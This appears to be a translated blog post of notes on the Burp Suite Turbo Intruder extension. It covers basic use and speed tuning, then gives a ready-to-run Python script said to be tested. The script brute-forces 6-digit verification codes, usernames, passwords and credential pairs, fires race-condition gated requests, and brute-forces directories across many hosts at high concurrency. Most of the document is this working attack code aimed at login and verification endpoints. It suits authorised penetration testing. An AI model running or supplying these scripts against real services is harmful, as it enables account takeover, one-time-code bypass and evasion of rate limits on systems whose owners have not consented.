Summary: notes on using the Turbo Intruder extension in Burp Suite.

Environment

Burp version: Burp Suite Professional v2023.11.1.1
Turbo Intruder version: v1.42

Usage

Step 1:
In the POST request, select the field you want to brute-force, then send the request to the Turbo Intruder extension.

(Figure: Turbo Intruder插件使用记录1.png)

Step 2:
The field selected for brute-forcing has now been replaced with a placeholder. Next, choose the built-in examples/basic.py script (make sure the Python script contains no Chinese characters) and change its wordlist to your own. Finally, click the "Attack" button.

(Figure: Turbo Intruder插件使用记录2.png)
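
Concretely, the field selected in step 1 shows up in target.req as a %s placeholder, and each value passed to engine.queue() is substituted into that position before the request is sent. A minimal sketch of the idea (the login request shown in the comment and the two candidate values are made up for illustration):

def queueRequests(target, wordlists):
    # target.req is the captured request with the selected field replaced by %s, e.g.:
    #   POST /login HTTP/1.1
    #   Host: example.com
    #   ...
    #   username=admin&password=%s
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=100,
                           pipeline=True)

    # each queued value replaces %s in a copy of the request
    engine.queue(target.req, 'admin123')   # sends ...password=admin123
    engine.queue(target.req, '123456')     # sends ...password=123456


def handleResponse(req, interesting):
    table.add(req)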

Step 3:
Below is what it looks like once the brute force has finished.

(Figure: Turbo Intruder插件使用记录3.png)

Speeding up the brute force

The parameters in Turbo Intruder with the biggest impact on speed are concurrentConnections, requestsPerConnection, and pipeline:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,    # target address
                           concurrentConnections=5,     # number of concurrent connections to the server
                           requestsPerConnection=100,   # max requests sent per connection
                           pipeline=True                # enable HTTP pipelining
                           )

    for word in open('/usr/share/dict/words'):
        engine.queue(target.req, word.rstrip())


def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status != 404:
        table.add(req)

A detailed explanation of these parameters can be found in: Turbo Intruder 使用 - 拥抱十亿请求攻击

Writing custom scripts

Taking the script above as an example, a custom script only needs to implement two functions, queueRequests and handleResponse, and create a RequestEngine inside queueRequests; the rest is ordinary Python code (Turbo Intruder runs scripts under Jython, i.e. Python 2 syntax, which is why from urllib import quote is used below). Note that Turbo Intruder does not modify the entries in your wordlist in any way, so values placed into a POST body have to be URL-encoded yourself with the quote function. It is also best to write the script in PyCharm, otherwise you may run into all kinds of strange problems.
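
Put together, the minimal structure looks roughly like this (the wordlist path is a placeholder, and quote() URL-encodes each candidate before it is substituted into the POST body):

from urllib import quote  # Jython / Python 2, as bundled with Turbo Intruder


def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=True)

    # Turbo Intruder sends wordlist entries unmodified, so URL-encode them here
    for word in open('/path/to/wordlist.txt'):
        engine.queue(target.req, quote(word.rstrip()))


def handleResponse(req, interesting):
    table.add(req)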

The following script has been tested and works; it is provided for reference only:

from urllib import quote
from itertools import product


def brute_verify_code(target, code_length):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    pattern = '1234567890'  # characters used to generate the candidate codes
    for i in product(pattern, repeat=code_length):  # product() yields the Cartesian product; repeat is the number of code positions
        code = ''.join(i)
        engine.queue(target.req, code)


def user_brute(target, user_dict_path):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    for word in open(user_dict_path):
        engine.queue(target.req, quote(word.rstrip()))


def password_brute(target, password_dict_path):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    for word in open(password_dict_path):
        engine.queue(target.req, quote(word.rstrip()))


def user_password_brute(target, user_dict_path, password_dict_path):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    for user in open(user_dict_path):
        for password in open(password_dict_path):
            engine.queue(target.req, [quote(user.rstrip()), quote(password.rstrip())])


def shorttime_concurrent_brute(target, connections=100):
    # race-condition style test: queue gated requests and release them all at once
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=connections,
                           requestsPerConnection=1,
                           pipeline=False
                           )
    # the 'gate' argument withholds part of each request until openGate is invoked
    # if you see a negative timestamp, the server responded before the request was complete
    for i in range(connections):
        # "gate"参数会阻塞每个请求的最后一个字节,直到调用openGate
        engine.queue(target.req, gate='race1')

    # once every 'race1' tagged request has been queued
    # invoke engine.openGate() to send them in sync
    # release the withheld final byte of every queued request at the same time
    engine.openGate('race1')

    # wait up to 120 seconds for the results
    engine.complete(timeout=120)


def mult_host_dir_brute(url_dict_path, domain_dict_path):
    # directory brute force across multiple hosts: one engine per domain, shared URL wordlist
    engines = {}
    req = '''GET /%s HTTP/1.1
Host: %s
Connection: keep-alive
'''
    for domain in open(domain_dict_path):
        domain = domain.rstrip()
        engine = RequestEngine(endpoint='https://' + domain + ':443',
                               concurrentConnections=30,
                               requestsPerConnection=100,
                               pipeline=True)
        engines[domain] = engine

    for url in open(url_dict_path):
        url = url.rstrip()
        for (domain, engine) in engines.items():
            engine.queue(req, [url, domain])


def queueRequests(target, wordlists):
    # change the wordlist paths below before use
    #user_brute(target, "user_dict_path")
    #password_brute(target, "password_dict_path")
    #user_password_brute(target, "user_dict_path", "password_dict_path")
    brute_verify_code(target, 6)
    #mult_host_dir_brute("url_dict_path", "domain_dict_path")
    #shorttime_concurrent_brute(target, 100)


def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    table.add(req)
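
With a large wordlist, the handleResponse above dumps every response into the results table. A variant that drops obvious failures can cut the noise; the 404 check comes from the basic.py example, while the length check against a failed-login baseline is an assumption you would tune per target:

def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status == 404:
        return  # not found: ignore
    if req.length == 1532:  # hypothetical length of the target's "login failed" response
        return
    table.add(req)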

References

Turbo Intruder:突破速率限制
Turbo Intruder 使用 - 拥抱十亿请求攻击
